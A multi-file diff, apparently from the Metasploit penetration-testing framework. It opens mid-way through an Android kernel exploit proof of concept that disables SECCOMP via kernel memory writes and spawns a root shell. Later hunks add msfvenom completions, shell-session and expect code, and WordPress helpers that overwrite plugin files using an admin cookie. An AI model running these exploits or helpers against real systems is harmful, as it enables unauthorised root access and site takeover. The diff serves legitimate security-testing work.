+    perror("open");
+    exit(1);
+  }
+
+  if (setns(fd, CLONE_NEWNS) < 0) {
+    perror("setns");
+    exit(1);
+  }
+
+  printf("Re-joining the init net namespace...\n");
+
+  fd = open("/proc/1/ns/net", O_RDONLY);
+
+  if (fd < 0) {
+    perror("open");
+    exit(1);
+  }
+
+  if (setns(fd, CLONE_NEWNET) < 0) {
+    perror("setns");
+    exit(1);
+  }
+
+  // Grant: SECCOMP isn't enabled when running the poc from ADB, only from app contexts
+  if (prctl(PR_GET_SECCOMP) != 0) {
+    printf("Disabling SECCOMP\n");
+
+    // Grant: we need to clear TIF_SECCOMP from task first, otherwise, kernel WARN
+    // clear the TIF_SECCOMP flag and everything else :P (feel free to modify this to just clear the single flag)
+    // arch/arm64/include/asm/thread_info.h:#define TIF_SECCOMP 11
+    kernel_write_ulong(current_ptr + OFFSET__task_struct__thread_info__flags, 0);
+    kernel_write_ulong(current_ptr + OFFSET__task_struct__cred + 0xa8, 0);
+    kernel_write_ulong(current_ptr + OFFSET__task_struct__cred + 0xa0, 0);
+
+    if (prctl(PR_GET_SECCOMP) != 0) {
+      printf("Failed to disable SECCOMP!\n");
+      exit(1);
+    } else {
+      printf("SECCOMP disabled!\n");
+    }
+  } else {
+    printf("SECCOMP is already disabled!\n");
+  }
+
+  /*kernel_read(my_cred, readbuf, readsize);*/
+  /*hexdump_memory(readbuf, readsize);*/
+
+  system("/system/bin/sh -i");
+
+  /*unsigned long init_uts_ns = kernel_base + SYMBOL__init_uts_ns;*/
+  /*char new_uts_version[] = "EXPLOITED KERNEL";*/
+  /*kernel_write(init_uts_ns + OFFSET__uts_namespace__name__version, new_uts_version, sizeof(new_uts_version));*/
+}
@@ -21,18 +21,20 @@
 # ------------------------------------------------------------------------------

 _arguments \
+  "--defer-module-loads[Defer module loading unless explicitly asked]" \
  {-a,--ask}"[Ask before exiting Metasploit or accept 'exit -y']" \
  "-c[Load the specified configuration file]:configuration file:_files" \
-  {-E,--environment}"[Specify the database environment to load from the configuration]:environment:(production development)" \
+  {-E,--environment}"[Set Rails environment, defaults to RAIL_ENV environment variable or 'production']:environment:(production development)" \
+  {-H,--history-file}"[Save command history to the specified file]:history file:_files" \
  {-h,--help}"[Show help text]" \
  {-L,--real-readline}"[Use the system Readline library instead of RbReadline]" \
  {-M,--migration-path}"[Specify a directory containing additional DB migrations]:directory:_files -/" \
-  {-m,--module-path}"[Specifies an additional module search path]:search path:_files -/" \
+  {-m,--module-path}"[Load an additional module path]:module path:_files -/" \
  {-n,--no-database}"[Disable database support]" \
  {-o,--output}"[Output to the specified file]:output file" \
  {-p,--plugin}"[Load a plugin on startup]:plugin file:_files" \
  {-q,--quiet}"[Do not print the banner on startup]" \
  {-r,--resource}"[Execute the specified resource file (- for stdin)]:resource file:_files" \
  {-v,--version}"[Show version]" \
-  {-x,--execute-command}"[Execute the specified string as console commands]:commands" \
+  {-x,--execute-command}"[Execute the specified console commands (use ; for multiples)]:commands" \
  {-y,--yaml}"[Specify a YAML file containing database settings]:yaml file:_files"
@@ -20,9 +20,49 @@
 #
 # ------------------------------------------------------------------------------

+_msfvenom_archs_list=(
+  'aarch64'
+  'armbe'
+  'armle'
+  'cbea'
+  'cbea64'
+  'cmd'
+  'dalvik'
+  'firefox'
+  'java'
+  'mips'
+  'mips64'
+  'mips64le'
+  'mipsbe'
+  'mipsle'
+  'nodejs'
+  'php'
+  'ppc'
+  'ppc64'
+  'ppc64le'
+  'ppce500v2'
+  'python'
+  'r'
+  'ruby'
+  'sparc'
+  'sparc64'
+  'tty'
+  'x64'
+  'x86'
+  'x86_64'
+  'zarch'
+)
+
+_msfvenom_arch() {
+  _describe -t archs 'available archs' _msfvenom_archs_list || compadd "$@"
+}
+
 _msfvenom_encoders_list=(
+  'cmd/brace'
+  'cmd/echo'
  'cmd/generic_sh'
  'cmd/ifs'
+  'cmd/perl'
  'cmd/powershell_base64'
  'cmd/printf_php_mq'
  'generic/eicar'
@@ -34,14 +74,19 @@ _msfvenom_encoders_list=(
  'php/base64'
  'ppc/longxor'
  'ppc/longxor_tag'
+  'ruby/base64'
  'sparc/longxor_tag'
  'x64/xor'
+  'x64/xor_context'
+  'x64/xor_dynamic'
+  'x64/zutto_dekiru'
  'x86/add_sub'
  'x86/alpha_mixed'
  'x86/alpha_upper'
  'x86/avoid_underscore_tolower'
  'x86/avoid_utf8_tolower'
  'x86/bloxor'
+  'x86/bmp_polyglot'
  'x86/call4_dword_xor'
  'x86/context_cpuid'
  'x86/context_stat'
@@ -52,30 +97,139 @@ _msfvenom_encoders_list=(
  'x86/nonalpha'
  'x86/nonupper'
  'x86/opt_sub'
+  'x86/service'
  'x86/shikata_ga_nai'
  'x86/single_static_bit'
  'x86/unicode_mixed'
  'x86/unicode_upper'
+  'x86/xor_dynamic'
 )

 _msfvenom_encoder() {
  _describe -t encoders 'available encoders' _msfvenom_encoders_list || compadd "$@"
 }

+_msfvenom_formats_list=(
+  # Executable formats
+  'asp'
+  'aspx'
+  'aspx-exe'
+  'axis2'
+  'dll'
+  'elf'
+  'elf-so'
+  'exe'
+  'exe-only'
+  'exe-service'
+  'exe-small'
+  'hta-psh'
+  'jar'
+  'jsp'
+  'loop-vbs'
+  'macho'
+  'msi'
+  'msi-nouac'
+  'osx-app'
+  'psh'
+  'psh-cmd'
+  'psh-net'
+  'psh-reflection'
+  'vba'
+  'vba-exe'
+  'vba-psh'
+  'vbs'
+  'war'
+  # Transform formats
+  'bash'
+  'c'
+  'csharp'
+  'dw'
+  'dword'
+  'hex'
+  'java'
+  'js_be'
+  'js_le'
+  'num'
+  'perl'
+  'pl'
+  'powershell'
+  'ps1'
+  'py'
+  'python'
+  'raw'
+  'rb'
+  'ruby'
+  'sh'
+  'vbapplication'
+  'vbscript'
+)
+
+_msfvenom_format() {
+  _describe -t formats 'available formats' _msfvenom_formats_list || compadd "$@"
+}
+
+_msfvenom_platforms_list=(
+  'aix'
+  'android'
+  'apple_ios'
+  'brocade'
+  'bsd'
+  'bsdi'
+  'cisco'
+  'firefox'
+  'freebsd'
+  'hardware'
+  'hpux'
+  'irix'
+  'java'
+  'javascript'
+  'juniper'
+  'linux'
+  'mainframe'
+  'multi'
+  'netbsd'
+  'netware'
+  'nodejs'
+  'openbsd'
+  'osx'
+  'php'
+  'python'
+  'r'
+  'ruby'
+  'solaris'
+  'unifi'
+  'unix'
+  'unknown'
+  'windows'
+)
+
+_msfvenom_platform() {
+  _describe -t platforms 'available platforms' _msfvenom_platforms_list || compadd "$@"
+}
+
 _arguments \
-  {-a,--arch}"[The architecture to encode as]:architecture:(cmd generic mipsbe mipsle php ppc sparc x64 x86)" \
-  {-b,--bad-chars}"[The list of characters to avoid, example: '\x00\xff']:bad characters" \
+  "--smallest[Generate the smallest possible payload using all available encoders]" \
+  "--sec-name[The new section name to use when generating large Windows binaries. Default: random 4-character alpha string]" \
+  "--encoder-space[The maximum size of the encoded payload (defaults to the -s value)]:length" \
+  "--encrypt[The type of encryption or encoding to apply to the shellcode]:value" \
+  "--encrypt-key[A key to be used for --encrypt]:value" \
+  "--encrypt-iv[An initialization vector for --encrypt]:value" \
+  "--list-options[List --payload <value>'s standard, advanced and evasion options]" \
+  "--pad-nops[Use nopsled size specified by -n \<length\> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)]" \
+  "--platform[The platform for --payload (use --list platforms to list)]:target platform:_msfvenom_platform" \
+  {-a,--arch}"[The architecture to use for --payload and --encoders (use --list archs to list)]:architecture:_msfvenom_archs" \
+  {-b,--bad-chars}"[Characters to avoid example: '\x00\xff']:bad characters" \
  {-c,--add-code}"[Specify an additional win32 shellcode file to include]:shellcode file:_files" \
-  {-e,--encoder}"[The encoder to use]:encoder:_msfvenom_encoder" \
-  {-f,--format}"[Output format]:output format:(bash c csharp dw dword java js_be js_le num perl pl powershell ps1 py python raw rb ruby sh vbapplication vbscript asp aspx aspx-exe dll elf exe exe-only exe-service exe-small loop-vbs macho msi msi-nouac osx-app psh psh-net psh-reflection vba vba-exe vbs war)" \
-  "--help-formats[List available formats]" \
-  {-h,--help}"[Help banner]" \
+  {-e,--encoder}"[The encoder to use (use --list encoders to list)]:encoder:_msfvenom_encoder" \
+  {-f,--format}"[Output format (use --list formats to list)]:output format:_msfvenom_formats" \
+  {-h,--help}"[Show the help banner]" \
  {-i,--iterations}"[The number of times to encode the payload]:iterations" \
-  {-k,--keep}"[Preserve the template behavior and inject the payload as a new thread]" \
-  {-l,--list}"[List a module type]:module type:(all encoders nops payloads)" \
-  {-n,--nopsled}"[Prepend a nopsled of length size on to the payload]:nopsled length" \
-  {-o,--options}"[List the payload's standard options]" \
-  "--platform[The platform to encode for]:target platform:(android bsd bsdi java linux netware nodejs osx php python ruby solaris unix win)" \
-  {-p,--payload}"[Payload to use. Specify a '-' or stdin to use custom payloads]:payload" \
+  {-k,--keep}"[Preserve the --template behavior and inject the payload as a new thread]" \
+  {-l,--list}"[List all modules for \[type\]]:module type:(payloads encoders nops platforms archs encrypt formats all)" \
+  {-n,--nopsled}"[Prepend a nopsled of \[length\] size on to the payload]:nopsled length" \
+  {-o,--out}"[Save the payload to a file]:output file:_files" \
+  {-p,--payload}"[Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom]:payload" \
  {-s,--space}"[The maximum size of the resulting payload]:length" \
-  {-x,--template}"[Specify an alternate executable template]:template file:_files"
+  {-t,--timeout}"[The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)]:second" \
+  {-v,--var-name}"[Specify a custom variable name to use for certain output formats]:value" \
+  {-x,--template}"[Specify a custom executable file to use as a template]:template file:_files"
@@ -0,0 +1,74 @@
+# Sourced from Ruby's ext/pty/lib/expect.rb to allow for access from Windows,
+# which does not seem to have an issue using this particular method with
+# sockets (pipes and other handles won't work, so don't use it for that).
+# frozen_string_literal: true
+$expect_verbose = false
+
+# Expect library adds the IO instance method #expect, which does similar act to
+# tcl's expect extension.
+#
+# In order to use this method, you must require expect:
+#
+#   require 'expect'
+#
+# Please see #expect for usage.
+class IO
+  # call-seq:
+  #   IO#expect(pattern,timeout=9999999)                  ->  Array
+  #   IO#expect(pattern,timeout=9999999) { |result| ... } ->  nil
+  #
+  # Reads from the IO until the given +pattern+ matches or the +timeout+ is over.
+  #
+  # It returns an array with the read buffer, followed by the matches.
+  # If a block is given, the result is yielded to the block and returns nil.
+  #
+  # When called without a block, it waits until the input that matches the
+  # given +pattern+ is obtained from the IO or the time specified as the
+  # timeout passes. An array is returned when the pattern is obtained from the
+  # IO. The first element of the array is the entire string obtained from the
+  # IO until the pattern matches, followed by elements indicating which the
+  # pattern which matched to the anchor in the regular expression.
+  #
+  # The optional timeout parameter defines, in seconds, the total time to wait
+  # for the pattern.  If the timeout expires or eof is found, nil is returned
+  # or yielded.  However, the buffer in a timeout session is kept for the next
+  # expect call.  The default timeout is 9999999 seconds.
+  def expect(pat,timeout=9999999)
+    buf = ''.dup
+    case pat
+    when String
+      e_pat = Regexp.new(Regexp.quote(pat))
+    when Regexp
+      e_pat = pat
+    else
+      raise TypeError, "unsupported pattern class: #{pat.class}"
+    end
+    @unusedBuf ||= ''
+    while true
+      if not @unusedBuf.empty?
+        c = @unusedBuf.slice!(0)
+      elsif !IO.select([self],nil,nil,timeout) or eof? then
+        result = nil
+        @unusedBuf = buf
+        break
+      else
+        c = getc
+      end
+      buf << c
+      if $expect_verbose
+        STDOUT.print c
+        STDOUT.flush
+      end
+      if mat=e_pat.match(buf) then
+        result = [buf,*mat.captures]
+        break
+      end
+    end
+    if block_given? then
+      yield result
+    else
+      return result
+    end
+    nil
+  end
+end
@@ -4,7 +4,7 @@ module LootDataProxy
    begin
      self.data_service_operation do |data_service|
        if !data_service.is_a?(Msf::DBManager)
-          opts[:data] = Base64.urlsafe_encode64(opts[:data]) if opts[:data]
+          opts[:data] = Base64.urlsafe_encode64(opts[:data].empty? ? "" : opts[:data].join('')) if opts[:data] and opts[:data].kind_of?(Array) else opts[:data]
        end
        add_opts_workspace(opts)
        data_service.report_loot(opts)
@@ -58,4 +58,4 @@ module LootDataProxy
      self.log_error(e, "Problem updating loot")
    end
  end
-end
+end
@@ -163,7 +163,7 @@ class Metasploit::Framework::ParsedOptions::Base

      option_parser.on(
          '--defer-module-loads',
-          'Defer module loading unless explicitly asked.'
+          'Defer module loading unless explicitly asked'
      ) do
        options.modules.defer_loads = true
      end
@@ -30,7 +30,7 @@ module Metasploit
        end
      end

-      VERSION = "5.0.72"
+      VERSION = "5.0.80"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -0,0 +1,76 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/command_shell'
+
+module Msf::Sessions
+
+###
+#
+# This class provides basic interaction with a ChannelFD
+# abstraction provided by the Rex::Proto::Ssh wrapper
+# around HrrRbSsh.
+#
+#  Date:    June 22, 2019
+#  Author:  RageLtMan
+#
+###
+class SshCommandShell < Msf::Sessions::CommandShell
+
+  #
+  # This interface supports basic interaction.
+  #
+  include Msf::Session::Basic
+
+  #
+  # This interface supports interacting with a single command shell.
+  #
+  include Msf::Session::Provider::SingleCommandShell
+
+  ##
+  #
+  # Returns the session description.
+  #
+  def desc
+    "SSH command shell"
+  end
+
+  def shell_command(cmd)
+    # Send the command to the session's stdin.
+    shell_write(cmd + "\n")
+
+    timeo = 0.5
+    etime = ::Time.now.to_f + timeo
+    buff = ""
+
+    # Keep reading data until no more data is available or the timeout is
+    # reached.
+    while (::Time.now.to_f < etime and ::IO.select([rstream.fd_rd], nil, nil, timeo))
+      res = shell_read(-1, 0.01)
+      buff << res if res
+      timeo = etime - ::Time.now.to_f
+    end
+
+    buff
+  end
+
+protected
+
+  def _interact_stream
+    fdr = [rstream.fd_rd, user_input.fd]
+    fdw = [rstream.fd_wr, user_input.fd]
+    while self.interacting
+      sd = Rex::ThreadSafe.select(fdr, nil, fdw, 0.5)
+      next unless sd
+
+      if sd[0].include? rstream.fd_rd
+        user_output.print(shell_read)
+      end
+      if sd[0].include? user_input.fd
+        run_single((user_input.gets || '').chomp("\n"))
+      end
+      Thread.pass
+    end
+  end
+
+end
+end
@@ -173,7 +173,7 @@ protected
        mod.framework.ready.delete run_uuid
        result = block.call(mod)
        mod.framework.results[run_uuid] = {result: result}
-      rescue Exception => e
+      rescue ::Exception => e
        mod.framework.results[run_uuid] = {error: e.to_s}
        raise
      ensure
@@ -105,8 +105,8 @@ module Payload
            fmt) +
          output

-        # If it's multistage, include the second stage too
-        if payload.staged?
+        # If verbose was requested and it's multistage, include the second stage too
+        if opts['Verbose'] && payload.staged?
          stage = payload.generate_stage

          # If a stage was generated, then display it
@@ -82,6 +82,17 @@ module Auxiliary::AuthBrute
    end
  end

+  # Yields each Metasploit::Credential::Core in the Mdm::Workspace with
+  # a private type of 'nil'
+  #
+  # @yieldparam [Metasploit::Credential::Core]
+  def each_username_cred
+    creds = framework.db.creds(type: nil, workspace: myworkspace.name)
+    creds.each do |cred|
+      yield cred
+    end
+  end
+
  # Checks whether we should be adding creds from the DB to a CredCollection
  #
  # @return [TrueClass] if any of the datastore options for db creds are selected and the db is active
@@ -135,6 +146,21 @@ module Auxiliary::AuthBrute
    cred_collection
  end

+  # This method takes a Metasploit::Framework::CredentialCollection and prepends existing Usernames
+  # from the database. This allows the users to use the DB_ALL_USERS option.
+  #
+  # @param cred_collection [Metasploit::Framework::CredentialCollection]
+  #    the credential collection to add to
+  # @return [Metasploit::Framework::CredentialCollection] the modified Credentialcollection
+  def prepend_db_usernames(cred_collection)
+    if prepend_db_creds?
+      each_username_cred do |cred|
+        process_cred_for_collection(cred_collection,cred)
+      end
+    end
+    cred_collection
+  end
+
  # Takes a Metasploit::Credential::Core and converts it into a
  # Metasploit::Framework::Credential and processes it into the
  # Metasploit::Framework::CredentialCollection as dictated by the
@@ -34,7 +34,6 @@ end

 def check
  nmod = replicant
-  nmod.datastore['RHOST'] = @original_rhost
  begin
    nmod.check_host(datastore['RHOST'])
  rescue NoMethodError
@@ -0,0 +1,45 @@
+# -*- coding: binary -*-
+
+#
+# XXX: This is a VERY ROUGH mixin for automatic check (formerly ForceExploit)
+#
+
+module Msf
+module Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super
+
+    register_advanced_options([
+      OptBool.new('AutoCheck', [false, 'Run check before exploitation', true])
+    ])
+  end
+
+  def exploit
+    unless datastore['AutoCheck']
+      print_warning('AutoCheck is disabled. Proceeding with exploitation.')
+      return
+    end
+
+    print_status('Executing automatic check (disable AutoCheck to override)')
+
+    # This isn't even my final form!
+    case (checkcode = check)
+    when Exploit::CheckCode::Vulnerable, Exploit::CheckCode::Appears
+      print_good(checkcode.message)
+    when Exploit::CheckCode::Detected
+      print_warning(checkcode.message)
+    when Exploit::CheckCode::Safe
+      fail_with(Module::Failure::NotVulnerable,
+                "#{checkcode.message}. Disable AutoCheck to override.")
+    when Exploit::CheckCode::Unsupported
+      fail_with(Module::Failure::BadConfig,
+                "#{checkcode.message}. Disable AutoCheck to override.")
+    else
+      fail_with(Module::Failure::Unknown,
+                "#{checkcode.message}. Disable AutoCheck to override.")
+    end
+  end
+
+end
+end
@@ -24,17 +24,23 @@ module Exploit::Remote::CheckModule

    # Bail if we couldn't
    unless mod
-      return CheckCode::Unsupported("Could not instantiate #{check_module}")
+      return CheckCode::Unsupported(
+        "Could not instantiate #{check_module}"
+      )
    end

    # Bail if it isn't aux
    if mod.type != Msf::MODULE_AUX
-      return CheckCode::Unsupported("#{check_module} is not an auxiliary module")
+      return CheckCode::Unsupported(
+        "#{check_module} is not an auxiliary module"
+      )
    end

    # Bail if run isn't defined
    unless mod.respond_to?(:run)
-      return CheckCode::Unsupported("#{check_module} does not define a run method")
+      return CheckCode::Unsupported(
+        "#{check_module} does not define a run method"
+      )
    end

    print_status("Using #{check_module} as check")
@@ -57,14 +63,18 @@ module Exploit::Remote::CheckModule

      # Bail if module doesn't return a CheckCode
      unless checkcode.kind_of?(Exploit::CheckCode)
-        return Exploit::CheckCode::Unsupported("#{check_module} does not return a CheckCode")
+        return Exploit::CheckCode::Unsupported(
+          "#{check_module} does not return a CheckCode"
+        )
      end

      # Return the CheckCode
      checkcode
    else
      # Bail if module doesn't return a CheckCode
-      Exploit::CheckCode::Unsupported("#{check_module} does not return a CheckCode")
+      Exploit::CheckCode::Unsupported(
+        "#{check_module} does not return a CheckCode"
+      )
    end
  end

@@ -40,7 +40,7 @@ module Exploit::EXE

  def get_custom_exe(path = nil)
    path ||= datastore['EXE::Custom']
-    print_status("Using custom payload #{path}, RHOST and RPORT settings will be ignored!")
+    print_status("Using custom payload #{path}, no handler will be created!")
    datastore['DisablePayloadHandler'] = true
    exe = nil
    ::File.open(path,'rb') {|f| exe = f.read(f.stat.size)}
@@ -0,0 +1,41 @@
+# -*- coding: binary -*-
+
+#
+# XXX: This is a VERY ROUGH mixin for Expect-style interaction
+#
+
+require 'expect'
+
+module Msf::Exploit::Expect
+
+  # Send a line and expect a pattern
+  #
+  # @param line [String] Line to send
+  # @param pattern [Regexp] Pattern to expect
+  # @param sock [Socket] Socket to send/expect on
+  # @param newline [String] Newline character(s)
+  # @param timeout [Float] Seconds to expect pattern
+  # @return [void]
+  def send_expect(line, pattern, sock:, newline: "\n", timeout: 3.5)
+    unless sock.respond_to?(:put) && sock.respond_to?(:expect)
+      raise ArgumentError, 'sock does not appear to be a socket'
+    end
+
+    if line
+      print_status("Sending: #{line}")
+      sock.put("#{line}#{newline}")
+    end
+
+    return unless pattern
+
+    print_status("Expecting: #{pattern.inspect}")
+    sock.expect(pattern, timeout) do |res|
+      unless res
+        raise Timeout::Error, "Pattern not found: #{pattern.inspect}"
+      end
+
+      vprint_good("Received: #{res.first}")
+    end
+  end
+
+end
@@ -44,7 +44,9 @@ module Exploit::Remote::HttpClient
        OptString.new('DOMAIN', [ true, 'The domain to use for windows authentification', 'WORKSTATION']),
        OptFloat.new('HttpClientTimeout', [false, 'HTTP connection and receive timeout']),
        OptBool.new('HttpPartialResponses', [false, 'Return partial HTTP responses despite timeouts', false]),
-        OptBool.new('HttpTrace', [false, 'Show the raw HTTP requests and responses', false])
+        OptBool.new('HttpTrace', [false, 'Show the raw HTTP requests and responses', false]),
+        OptBool.new('HttpTraceHeadersOnly', [false, 'Show HTTP headers only in HttpTrace', false]),
+        OptString.new('HttpTraceColors', [false, 'HTTP request and response colors for HttpTrace (unset to disable)', 'red/blu'])
      ], self.class
    )

@@ -317,13 +319,18 @@ module Exploit::Remote::HttpClient

    begin
      c = connect(opts)
-      r = c.request_raw(opts)
+      r = opts[:cgi] ? c.request_cgi(opts) : c.request_raw(opts)

      if datastore['HttpTrace']
+        request_color, response_color =
+          (datastore['HttpTraceColors'] || '').split('/').map { |color| "%bld%#{color}" }
+
+        request = r.to_s(headers_only: datastore['HttpTraceHeaders'])
+
        print_line('#' * 20)
        print_line('# Request:')
        print_line('#' * 20)
-        print_line(r.to_s)
+        print_line("%clr#{request_color}#{request}%clr")
      end

      res = c.send_recv(r, actual_timeout)
@@ -332,10 +339,13 @@ module Exploit::Remote::HttpClient
        print_line('#' * 20)
        print_line('# Response:')
        print_line('#' * 20)
-        if res.nil?
-          print_line("No response received")
+
+        if res
+          response = res.to_terminal_output(headers_only: datastore['HttpTraceHeadersOnly'])
+
+          print_line("%clr#{response_color}#{response}%clr")
        else
-          print_line(res.to_terminal_output)
+          print_line('No response received')
        end
      end

@@ -362,51 +372,7 @@ module Exploit::Remote::HttpClient
  #
  # @return (see Rex::Proto::Http::Client#send_recv))
  def send_request_cgi(opts={}, timeout = 20, disconnect = true)
-    if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
-      actual_timeout = datastore['HttpClientTimeout']
-    else
-      actual_timeout =  opts[:timeout] || timeout
-    end
-
-    print_line("*" * 20) if datastore['HttpTrace']
-
-    begin
-      c = connect(opts)
-      r = c.request_cgi(opts)
-
-      if datastore['HttpTrace']
-        print_line('#' * 20)
-        print_line('# Request:')
-        print_line('#' * 20)
-        print_line(r.to_s)
-      end
-
-      res = c.send_recv(r, actual_timeout)
-
-      if datastore['HttpTrace']
-        print_line('#' * 20)
-        print_line('# Response:')
-        print_line('#' * 20)
-        if res.nil?
-          print_line("No response received")
-        else
-          print_line(res.to_terminal_output)
-        end
-      end
-
-      disconnect(c) if disconnect
-
-      res
-    rescue ::Errno::EPIPE, ::Timeout::Error => e
-      print_line(e.message) if datastore['HttpTrace']
-      nil
-    rescue Rex::ConnectionError => e
-      vprint_error(e.to_s)
-      nil
-    rescue ::Exception => e
-      print_line(e.message) if datastore['HttpTrace']
-      raise e
-    end
+    send_request_raw(opts.merge(cgi: true), timeout, disconnect)
  end

  # Connects to the server, creates a request, sends the request, reads the
@@ -40,4 +40,54 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin
      return false
    end
  end
+
+  # Edits a plugin file (relative to plugins dir) using a valid admin session.
+  #
+  # @param file [String] The plugin file to edit (relative to plugins dir)
+  # @param contents [String] The plugin file contents to overwrite with
+  # @param cookie [String] A valid admin session cookie
+  # @return [Boolean] true on success, false on error
+  def wordpress_edit_plugin(file, contents, cookie)
+    unless (nonce = wordpress_helper_get_plugin_edit_nonce(cookie, file))
+      vprint_error('Failed to acquire the plugin edit nonce')
+      return false
+    end
+
+    vprint_status("Acquired a plugin edit nonce: #{nonce}")
+
+    # https://github.com/WordPress/WordPress/blob/master/wp-admin/plugin-editor.php
+    res = send_request_cgi(
+      'method'       => 'POST',
+      'uri'          => wordpress_url_admin_plugin_editor,
+      'cookie'       => cookie,
+      'vars_post'    => {
+        'action'     => 'update',
+        '_wpnonce'   => nonce,
+        'file'       => file,
+        'newcontent' => contents
+      }
+    )
+
+    unless res && res.redirect?
+      vprint_error("Server responded with code #{res.code}") if res
+      vprint_error("Failed to edit plugin file #{file}")
+      return false
+    end
+
+    # NOTE: send_request_cgi! doesn't change the method
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => res.redirection.to_s,
+      'cookie' => cookie
+    )
+
+    unless res && res.code == 200 && res.body.include?('edited successfully')
+      vprint_error("Server responded with code #{res.code}") if res
+      vprint_error("Failed to edit plugin file #{file}")
+      return false
+    end
+
+    vprint_status("Edited plugin file #{file}")
+    true
+  end
 end
@@ -139,13 +139,13 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
  #
  # @param cookie [String] A valid admin session cookie
  # @return [String,nil] The nonce, nil on error
-  def wordpress_helper_get_plugin_upload_nonce(cookie, path = nil)
+  def wordpress_helper_get_plugin_upload_nonce(cookie, path = nil, vars_get = nil)
    uri = path || normalize_uri(wordpress_url_backend, 'plugin-install.php')
    options = {
      'method'    => 'GET',
      'uri'       => uri,
      'cookie'    => cookie,
-      'vars_get'  => { 'tab' => 'upload' }
+      'vars_get'  => vars_get || { 'tab' => 'upload' }
    }
    res = send_request_cgi(options)
    if res && res.code == 200
@@ -155,4 +155,40 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
      return wordpress_helper_get_plugin_upload_nonce(cookie, path)
    end
  end
+
+  # Helper method to retrieve a valid plugin edit nonce.
+  #
+  # @param cookie [String] A valid admin session cookie
+  # @param file [String] The plugin file to edit (relative to plugins dir)
+  # @return [String,nil] The nonce, nil on error
+  def wordpress_helper_get_plugin_edit_nonce(cookie, file)
+    wordpress_helper_get_plugin_upload_nonce(
+      cookie,
+      normalize_uri(wordpress_url_backend, 'plugin-editor.php'),
+      'file' => file
+    )
+  end
+
+  # Helper method to retrieve plugin file contents.
+  #
+  # @param cookie [String] A valid admin session cookie
+  # @param file [String] The plugin file to retrieve (relative to plugins dir)
+  # @return [String,nil] The contents, nil on error
+  def wordpress_helper_get_plugin_file_contents(cookie, file)
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => normalize_uri(wordpress_url_backend, 'plugin-editor.php'),
+      'cookie'   => cookie,
+      'vars_get' => {'file' => file}
+    )
+
+    return unless res && res.code == 200
+
+    contents = res.get_html_document.at('//textarea[@name = "newcontent"]')
+
+    return unless contents
+
+    contents.text
+  end
+
 end
@@ -94,6 +94,13 @@ module Msf::Exploit::Remote::HTTP::Wordpress::URIs
    normalize_uri(wordpress_url_backend, 'update.php')
  end

+  # Returns the Wordpress Admin Plugin Editor URL
+  #
+  # @return [String] Wordpress Admin Plugin Editor URL
+  def wordpress_url_admin_plugin_editor
+    normalize_uri(wordpress_url_backend, 'plugin-editor.php')
+  end
+
  # Returns the Wordpress wp-content dir URL
  #
  # @return [String] Wordpress wp-content dir URL
@@ -183,7 +183,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Version
      return Msf::Exploit::CheckCode::Detected("Could not identify the version number")
    end

-    vprint_status("Found version #{version} of the #{item_type}")
+    vprint_status("Found version #{version} in the #{item_type}")

    if fixed_version.nil?
      if vuln_introduced_version.nil?
--- a/Show More
+++ b/Show More